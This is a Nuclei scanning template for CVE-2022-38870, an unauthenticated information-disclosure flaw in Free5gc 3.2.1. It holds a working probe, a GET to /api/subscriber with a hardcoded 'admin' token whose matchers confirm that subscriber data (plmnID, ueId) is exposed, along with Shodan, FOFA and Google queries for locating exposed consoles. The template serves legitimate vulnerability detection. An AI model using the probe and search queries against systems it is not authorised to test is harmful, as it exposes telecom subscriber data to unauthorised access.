id: CVE-2022-38870 info: name: Free5gc 3.2.1 - Information Disclosure author: For3stCo1d severity: high description: | Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | Successful exploitation of this vulnerability could result in unauthorized access to sensitive information. remediation: | Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability. reference: - https://github.com/free5gc/free5gc/issues/387 - https://nvd.nist.gov/vuln/detail/CVE-2022-38870 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-38870 cwe-id: CWE-306 epss-score: 0.01531 epss-percentile: 0.8705 cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: free5gc product: free5gc shodan-query: - http.title:"free5GC Web Console" - http.title:"free5gc web console" fofa-query: title="free5gc web console" google-query: intitle:"free5gc web console" tags: cve,cve2022,free5gc,exposure http: - raw: - | GET /api/subscriber HTTP/1.1 Host: {{Hostname}} Token: admin matchers-condition: and matchers: - type: word part: body words: - '"plmnID":' - '"ueId":' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 490a004630440220530de25fd2aa5188ccc446773bf2beaa97de3e6ab7d44bdda6c2d355e157c3a902204a6dc27b1cf836e8fc177889d1be5f4d8badadae80c48b38011f9ac73e36f27d:922c64590222798bb761d5b6d8e72950